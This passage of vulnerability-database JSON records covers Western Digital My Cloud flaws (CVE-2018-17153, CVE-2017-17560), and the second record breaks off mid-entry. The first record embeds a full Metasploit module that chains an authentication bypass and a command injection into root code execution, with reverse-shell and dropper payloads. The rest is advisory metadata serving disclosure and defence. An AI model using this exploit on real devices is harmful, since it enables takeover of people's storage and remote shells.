"data": "It was discovered that the Western Digital My Cloud device before 2.30.196 is affected by an authentication bypass vulnerability. An unauthenticated attacker can exploit this vulnerability to authenticate as an admin user without needing to provide a password, thereby gaining full control of the device. (Whenever an admin logs into My Cloud, a server-side session is created that is bound to the user\u0027s IP address. After the session is created, it is possible to call authenticated CGI modules by sending the cookie username=admin in the HTTP request. The invoked CGI will check if a valid session is present and bound to the user\u0027s IP address.) It was found that it is possible for an unauthenticated attacker to create a valid session without a login. The network_mgr.cgi CGI module contains a command called \"cgi_get_ipv6\" that starts an admin session -- tied to the IP address of the user making the request -- if the additional parameter \"flag\" with the value \"1\" is provided. Subsequent invocation of commands that would normally require admin privileges now succeed if an attacker sets the username=admin cookie. \nAn attacker can exploit this issue to bypass authentication mechanism and perform unauthorized actions. This may lead to further attacks. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n \u0027Name\u0027 =\u003e \u0027Western Digital MyCloud unauthenticated command injection\u0027,\n \u0027Description\u0027 =\u003e %q{\n This module exploits authentication bypass (CVE-2018-17153) and\n command injection (CVE-2016-10108) vulnerabilities in Western\n Digital MyCloud before 2.30.196 in order to achieve\n unauthenticated remote code execution as the root user. \n\n The module first performs a check to see if the target is\n WD MyCloud. If so, it attempts to trigger an authentication\n bypass (CVE-2018-17153) via a crafted GET request to\n /cgi-bin/network_mgr.cgi. If the server responds as expected,\n the module assesses the vulnerability status by attempting to\n exploit a commend injection vulnerability (CVE-2016-10108) in\n order to print a random string via the echo command. This is\n done via a crafted POST request to /web/google_analytics.php. \n\n If the server is vulnerable, the same command injection vector\n is leveraged to execute the payload. \n\n This module has been successfully tested against Western Digital\n MyCloud version 2.30.183. \n\n Note: based on the available disclosures, it seems that the\n command injection vector (CVE-2016-10108) might be exploitable\n without the authentication bypass (CVE-2018-17153) on versions\n before 2.21.126. The obtained results on 2.30.183 imply that\n the patch for CVE-2016-10108 did not actually remove the command\n injection vector, but only prevented unauthenticated access to it. \n },\n \u0027License\u0027 =\u003e MSF_LICENSE,\n \u0027Author\u0027 =\u003e [\n \u0027Erik Wynter\u0027, # @wyntererik - Metasploit\n \u0027Steven Campbell\u0027, # CVE-2016-10108 disclosure and PoC\n \u0027Remco Vermeulen\u0027 # CVE-2018-17153 disclosure and PoC\n ],\n \u0027References\u0027 =\u003e [\n [\u0027CVE\u0027, \u00272016-10108\u0027], # command injection in /web/google_analytics.php via a modified arg parameter in the POST data. \n [\u0027CVE\u0027, \u00272018-17153\u0027], # authentication bypass\n [\u0027URL\u0027, \u0027https://www.securify.nl/advisory/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges/\u0027], # CVE-2018-17153 disclosure and PoC\n [\u0027URL\u0027, \u0027https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/\u0027] # CVE-2016-10108 disclosure and PoC\n ],\n \u0027DefaultOptions\u0027 =\u003e {\n \u0027RPORT\u0027 =\u003e 443,\n \u0027SSL\u0027 =\u003e true\n },\n \u0027Platform\u0027 =\u003e %w[linux unix],\n \u0027Arch\u0027 =\u003e [ ARCH_ARMLE, ARCH_CMD ],\n \u0027Targets\u0027 =\u003e [\n [\n \u0027Unix In-Memory\u0027,\n {\n \u0027Platform\u0027 =\u003e [ \u0027unix\u0027, \u0027linux\u0027 ],\n \u0027Arch\u0027 =\u003e ARCH_CMD,\n \u0027DefaultOptions\u0027 =\u003e { \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_bash\u0027 },\n \u0027Type\u0027 =\u003e :unix_memory\n }\n ],\n [\n \u0027Linux Dropper\u0027, {\n \u0027Arch\u0027 =\u003e [ARCH_ARMLE],\n \u0027Platform\u0027 =\u003e \u0027linux\u0027,\n \u0027DefaultOptions\u0027 =\u003e {\n \u0027PAYLOAD\u0027 =\u003e \u0027linux/armle/meterpreter/reverse_tcp\u0027,\n \u0027CMDSTAGER::FLAVOR\u0027 =\u003e :curl\n },\n \u0027Type\u0027 =\u003e :linux_dropper\n }\n ]\n ],\n \u0027CmdStagerFlavor\u0027 =\u003e [\u0027curl\u0027, \u0027wget\u0027],\n \u0027Privileged\u0027 =\u003e true,\n \u0027DisclosureDate\u0027 =\u003e \u00272016-12-14\u0027, # CVE-2016-10108 disclosure date\n \u0027DefaultTarget\u0027 =\u003e 0,\n \u0027Notes\u0027 =\u003e {\n \u0027Stability\u0027 =\u003e [ CRASH_SAFE ],\n \u0027SideEffects\u0027 =\u003e [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],\n \u0027Reliability\u0027 =\u003e [ REPEATABLE_SESSION ]\n }\n )\n )\n\n register_options([\n OptString.new(\u0027TARGETURI\u0027, [true, \u0027The base path to WD MyCloud\u0027, \u0027/\u0027]),\n ])\n end\n\n def check\n # sanity check to see if the target is likely WD MyCloud\n res = send_request_cgi({\n \u0027method\u0027 =\u003e \u0027GET\u0027,\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path)\n })\n\n return CheckCode::Unknown(\u0027Connection failed.\u0027) unless res\n\n return CheckCode::Safe(\u0027Target is not a WD MyCloud application.\u0027) unless res.code == 200 \u0026\u0026 res.body.include?(\u0027var MODEL_ID = \"WDMyCloud\u0027)\n\n print_status(\"#{rhost}:#{rport} - The target is WD MyCloud. Checking vulnerability status...\")\n # try the authentication bypass (CVE-2018-17153)\n res = send_request_cgi({\n \u0027method\u0027 =\u003e \u0027GET\u0027,\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027cgi-bin\u0027, \u0027network_mgr.cgi\u0027),\n \u0027vars_get\u0027 =\u003e {\n \u0027cmd\u0027 =\u003e \u0027cgi_get_ipv6\u0027,\n \u0027flag\u0027 =\u003e 1 # this cannot be randomized according to the CVE-2018-17153 details\n }\n })\n\n return CheckCode::Unknown(\u0027Connection failed while attempting to trigger the authentication bypass.\u0027) unless res\n\n return CheckCode::Unknown(\"Received unexpected response code #{res.code} while attempting to trigger the authentication bypass.\") unless res.code == 404\n\n # send a command to print a random string via echo. if the target is vulnerable, both the command and the command output will be part of the response body\n echo_cmd = \"echo #{Rex::Text.rand_text_alphanumeric(8..42)}\"\n print_status(\"#{rhost}:#{rport} - Attempting to execute #{echo_cmd}...\")\n res = execute_command(echo_cmd, { \u0027wait_for_response\u0027 =\u003e true })\n\n return CheckCode::Unknown(\u0027Connection failed while trying to execute the echo command to check the vulnerability status.\u0027) unless res\n\n return CheckCode::Vulnerable(\u0027The target executed the echo command.\u0027) if res.code == 200 \u0026\u0026 res.body.include?(echo_cmd) \u0026\u0026 res.body.include?(\u0027\"success\":true\u0027)\n\n CheckCode::Safe(\u0027The target failed to execute the echo command.\u0027)\n end\n\n def execute_command(cmd, opts = {})\n request_hash = {\n \u0027method\u0027 =\u003e \u0027POST\u0027,\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027web\u0027, \u0027google_analytics.php\u0027),\n \u0027cookie\u0027 =\u003e \u0027username=admin\u0027,\n \u0027vars_post\u0027 =\u003e {\n \u0027cmd\u0027 =\u003e \u0027set\u0027,\n \u0027opt\u0027 =\u003e \u0027cloud-device-num\u0027,\n \u0027arg\u0027 =\u003e \"0|echo `#{cmd}` #\"\n }\n }\n\n return send_request_cgi(request_hash) if opts[\u0027wait_for_response\u0027]\n\n # if we are trying to execute the payload, we can just yeet it at the server and return without waiting for a response\n send_request_cgi(request_hash, 0)\n end\n\n def exploit\n if target.arch.first == ARCH_CMD\n print_status(\"#{rhost}:#{rport} - Executing the payload. This may take a few seconds...\")\n execute_command(payload.encoded)\n else\n execute_cmdstager(background: true)\n end\n end\nend\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-17153"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012205"
},
{
"db": "BID",
"id": "105359"
},
{
"db": "VULMON",
"id": "CVE-2018-17153"
},
{
"db": "PACKETSTORM",
"id": "173802"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-17153",
"trust": 2.9
},
{
"db": "BID",
"id": "105359",
"trust": 1.4
},
{
"db": "PACKETSTORM",
"id": "173802",
"trust": 1.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012205",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201809-848",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2018-17153",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-17153"
},
{
"db": "BID",
"id": "105359"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012205"
},
{
"db": "PACKETSTORM",
"id": "173802"
},
{
"db": "NVD",
"id": "CVE-2018-17153"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-848"
}
]
},
"id": "VAR-201809-0306",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.85714287
},
"last_update_date": "2023-12-18T13:23:57.909000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Answer ID 25952",
"trust": 0.8,
"url": "https://support.wdc.com/knowledgebase/answer.aspx?id=25952"
},
{
"title": "The Register",
"trust": 0.2,
"url": "https://www.theregister.co.uk/2018/09/18/remote_access_vulnerability_western_digital_my_cloud/"
},
{
"title": "BleepingComputer",
"trust": 0.1,
"url": "https://www.bleepingcomputer.com/news/security/my-cloud-nas-devices-vulnerable-to-auth-bypass-for-over-a-year/"
},
{
"title": "BleepingComputer",
"trust": 0.1,
"url": "https://www.bleepingcomputer.com/news/security/western-digital-releases-hotfix-for-my-cloud-auth-bypass-vulnerability/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-17153"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012205"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-012205"
},
{
"db": "NVD",
"id": "CVE-2018-17153"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://securify.nl/nl/advisory/sfy20180102/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges.html"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/105359"
},
{
"trust": 1.1,
"url": "https://support.wdc.com/knowledgebase/answer.aspx?id=25952"
},
{
"trust": 1.1,
"url": "http://packetstormsecurity.com/files/173802/western-digital-mycloud-unauthenticated-command-injection.html"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-17153"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-17153"
},
{
"trust": 0.3,
"url": "https://www.securify.nl/advisory/sfy20180102/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges.html"
},
{
"trust": 0.3,
"url": "https://www.wdc.com"
},
{
"trust": 0.3,
"url": "https://blog.westerndigital.com/western-digital-my-cloud-update/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/287.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.bleepingcomputer.com/news/security/my-cloud-nas-devices-vulnerable-to-auth-bypass-for-over-a-year/"
},
{
"trust": 0.1,
"url": "https://metasploit.com/download"
},
{
"trust": 0.1,
"url": "https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/\u0027]"
},
{
"trust": 0.1,
"url": "https://github.com/rapid7/metasploit-framework"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10108"
},
{
"trust": 0.1,
"url": "https://www.securify.nl/advisory/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges/\u0027],"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-17153"
},
{
"db": "BID",
"id": "105359"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012205"
},
{
"db": "PACKETSTORM",
"id": "173802"
},
{
"db": "NVD",
"id": "CVE-2018-17153"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-848"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2018-17153"
},
{
"db": "BID",
"id": "105359"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012205"
},
{
"db": "PACKETSTORM",
"id": "173802"
},
{
"db": "NVD",
"id": "CVE-2018-17153"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-848"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-18T00:00:00",
"db": "VULMON",
"id": "CVE-2018-17153"
},
{
"date": "2018-09-19T00:00:00",
"db": "BID",
"id": "105359"
},
{
"date": "2019-01-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-012205"
},
{
"date": "2023-07-28T14:03:45",
"db": "PACKETSTORM",
"id": "173802"
},
{
"date": "2018-09-18T15:29:00.307000",
"db": "NVD",
"id": "CVE-2018-17153"
},
{
"date": "2018-09-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-848"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-07-28T00:00:00",
"db": "VULMON",
"id": "CVE-2018-17153"
},
{
"date": "2018-09-19T00:00:00",
"db": "BID",
"id": "105359"
},
{
"date": "2019-01-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-012205"
},
{
"date": "2023-07-28T16:15:10.547000",
"db": "NVD",
"id": "CVE-2018-17153"
},
{
"date": "2018-09-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-848"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "173802"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-848"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Western Digital My Cloud Authentication vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-012205"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201809-848"
}
],
"trust": 0.6
}
}
VAR-201712-0862
Vulnerability from variot - Updated: 2023-12-18 13:19An issue was discovered on Western Digital MyCloud PR4100 2.30.172 devices. The web administration component, /web/jquery/uploader/multi_uploadify.php, provides multipart upload functionality that is accessible without authentication and can be used to place a file anywhere on the device's file system. This allows an attacker the ability to upload a PHP shell onto the device and obtain arbitrary code execution as root. Western Digital My Cloud PR4100 The device contains an authentication vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Web administration component is one of the Web administration components. There is a security vulnerability in the web management component of Western Digital MyCloud PR4100 version 2.30.172
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201712-0862",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "my cloud pr4100",
"scope": "eq",
"trust": 1.0,
"vendor": "westerndigital",
"version": "2.30.172"
},
{
"model": "my cloud pr4100",
"scope": "eq",
"trust": 0.8,
"vendor": "western digital",
"version": "2.30.172"
},
{
"model": "my cloud pr4100",
"scope": "eq",
"trust": 0.6,
"vendor": "wdc",
"version": "2.30.172"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011514"
},
{
"db": "NVD",
"id": "CVE-2017-17560"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-409"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:westerndigital:my_cloud_pr4100_firmware:2.30.172:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_pr4100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-17560"
}
]
},
"cve": "CVE-2017-17560",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": true,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2017-17560",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-108595",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-17560",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-17560",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201712-409",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-108595",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2017-17560",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-108595"
},
{
"db": "VULMON",
"id": "CVE-2017-17560"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011514"
},
{
"db": "NVD",
"id": "CVE-2017-17560"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-409"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on Western Digital MyCloud PR4100 2.30.172 devices. The web administration component, /web/jquery/uploader/multi_uploadify.php, provides multipart upload functionality that is accessible without authentication and can be used to place a file anywhere on the device\u0027s file system. This allows an attacker the ability to upload a PHP shell onto the device and obtain arbitrary code execution as root. Western Digital My Cloud PR4100 The device contains an authentication vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Web administration component is one of the Web administration components. There is a security vulnerability in the web management component of Western Digital MyCloud PR4100 version 2.30.172",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-17560"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011514"
},
{
"db": "VULHUB",
"id": "VHN-108595"
},
{
"db": "VULMON",
"id": "CVE-2017-17560"
}
],
"trust": 1.8
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-108595",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=43356",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-108595"
},
{
"db": "VULMON",
"id": "CVE-2017-17560"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-17560",
"trust": 2.6
},
{
"db": "EXPLOIT-DB",
"id": "43356",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011514",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201712-409",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "145447",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-108595",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2017-17560",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-108595"
},
{
"db": "VULMON",
"id": "CVE-2017-17560"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011514"
},
{
"db": "NVD",
"id": "CVE-2017-17560"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-409"
}
]
},
"id": "VAR-201712-0862",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-108595"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:19:18.181000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "My Cloud PR4100",
"trust": 0.8,
"url": "https://support.wdc.com/product.aspx?id=2706"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011514"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-108595"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011514"
},
{
"db": "NVD",
"id": "CVE-2017-17560"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://github.com/rapid7/metasploit-framework/pull/9248"
},
{
"trust": 1.9,
"url": "https://www.exploit-db.com/exploits/43356/"
},
{
"trust": 1.8,
"url": "https://download.exploitee.rs/file/generic/exploiteers-defcon25.pdf"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-17560"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-17560"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/287.html"
},
{
"trust": 0.1,
"url": "https://tools.cisco.com/security/center/viewalert.x?alertid=56514"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.rapid7.com/db/modules/exploit/linux/http/wd_mycloud_multiupload_upload"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-108595"
},
{
"db": "VULMON",
"id": "CVE-2017-17560"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011514"
},
{
"db": "NVD",
"id": "CVE-2017-17560"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-409"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-108595"
},
{
"db": "VULMON",
"id": "CVE-2017-17560"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011514"
},
{
"db": "NVD",
"id": "CVE-2017-17560"
},
{
